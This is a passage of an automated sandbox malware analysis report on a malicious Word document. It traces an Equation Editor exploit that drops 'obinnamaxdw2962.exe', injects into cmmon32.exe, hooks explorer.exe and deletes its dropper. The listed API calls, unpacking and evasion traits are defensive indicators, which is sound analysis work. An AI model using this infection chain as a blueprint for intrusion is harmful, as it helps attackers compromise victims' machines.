Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B9CBA4
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B7DBDA
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AEFBD7
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B17B00
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B8FDDD
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B20D3B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AFCD5B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B22E2F
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00B0EE4C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021E1238
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0213E2E9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02142305
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02147353
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0218A37B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021663DB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0213F3CF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0216D005
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0215905A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02143040
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0213E0C6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021E2622
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02144680
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0214E6C1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021C579A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0214C7BC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021757C3
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02175485
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02151489
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0214351F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0215C5F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021F3A83
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02167B00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021ECBA4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0213FBD7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021CDBDA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0214C85C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0216286D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021DF8EE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021C5955
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021E098E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021429B2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021569FE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02172E2F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0215EE4C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02150F3F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0216DF7C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02170D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0214CD5B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021DFDDD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009E5E8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009E606
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009D6E7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009E87B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_00082D90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_00089E60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_00082FB0

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: String function: 00B3373B appears 229 times
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: String function: 00B5F970 appears 79 times
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: String function: 00B33F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: String function: 00AEE2A8 appears 37 times
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: String function: 00AEDF5C appears 103 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 0218373B appears 238 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 02183F92 appears 108 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 0213E2A8 appears 38 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 0213DF5C appears 107 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 021AF970 appears 81 times

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041A360 NtCreateFile,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041A410 NtReadFile,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041A490 NtClose,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041A540 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041A35B NtCreateFile,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041A31A NtCreateFile,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041A53A NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE00C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE0078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE0048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADF9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADF900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE10D0 NtOpenProcessToken,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE0060 NtQuerySection,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE01D4 NtSetValueKey,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE010C NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE1148 NtOpenThread,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE07AC NtCreateMutant,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADF8CC NtWaitForSingleObject,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADF938 NtWriteFile,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE1930 NtSetContextThread,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFAB8 NtQueryValueKey,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFA20 NtQueryInformationFile,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFA50 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFBE8 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFB50 NtCreateKey,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFC30 NtOpenProcess,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFC48 NtSetInformationFile,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE0C40 NtGetContextThread,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AE1D80 NtSuspendThread,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFD5C NtEnumerateKey,
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00ADFE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021300C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021307AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FAB8 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212F900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212F9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02130048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02130078 NtResumeThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02130060 NtQuerySection,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021310D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0213010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02131148 NtOpenThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_021301D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212F8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02131930 NtSetContextThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212F938 NtWriteFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02130C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0212FD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_02131D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009A360 NtCreateFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009A410 NtReadFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009A490 NtClose,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009A540 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009A31A NtCreateFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009A35B NtCreateFile,
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009A53A NtAllocateVirtualMemory,

Source: obinnazx[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: obinnamaxdw2962.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe	Memory allocated: 76E90000 page execute and read and write

Source: OBL PN210700369.doc

ReversingLabs: Detection: 31%

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Process created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe'

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$L PN210700369.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE5CC.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winDOC@9/8@3/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: explorer.exe, 00000006.00000000.442663039.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: cmmon32.pdb source: obinnamaxdw2962.exe, 00000005.00000002.504809742.0000000000030000.00000040.00020000.sdmp
Source:	Binary string: cmmon32.pdbr2v source: obinnamaxdw2962.exe, 00000005.00000002.504809742.0000000000030000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: obinnamaxdw2962.exe, cmmon32.exe

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: obinnamaxdw2962.exe.2.dr, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.obinnamaxdw2962.exe.9e0000.0.unpack, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.obinnamaxdw2962.exe.9e0000.3.unpack, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.obinnamaxdw2962.exe.9e0000.0.unpack, Darwin.WindowsForm/MainForm.cs	.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_009E93F1 push dword ptr [ebx]; retf
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 4_2_0036B1C3 push B8FFFFE6h; ret
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00417B5A pushad ; iretd
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00417B8C pushad ; iretd
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041D4B5 push eax; ret
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041D56C push eax; ret
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00416503 push ebx; ret
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041D502 push eax; ret
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041D50B push eax; ret
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_0041763B push 00000067h; iretd
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_004176C9 pushfd ; retf
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_009E93F1 push dword ptr [ebx]; retf
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe	Code function: 5_2_00AEDFA1 push ecx; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0213DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_00080001 push ss; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009D4B5 push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009D50B push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_00096503 push ebx; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009D502 push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009D56C push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_0009763B push 00000067h; iretd
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_000976C9 pushfd ; retf
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_00097B5A pushad ; iretd
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 7_2_00097B8C pushad ; iretd

Source: initial sample	Static PE information: section name: .text entropy: 7.03259314681
Source: initial sample	Static PE information: section name: .text entropy: 7.03259314681

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obinnazx[1].exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEF

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
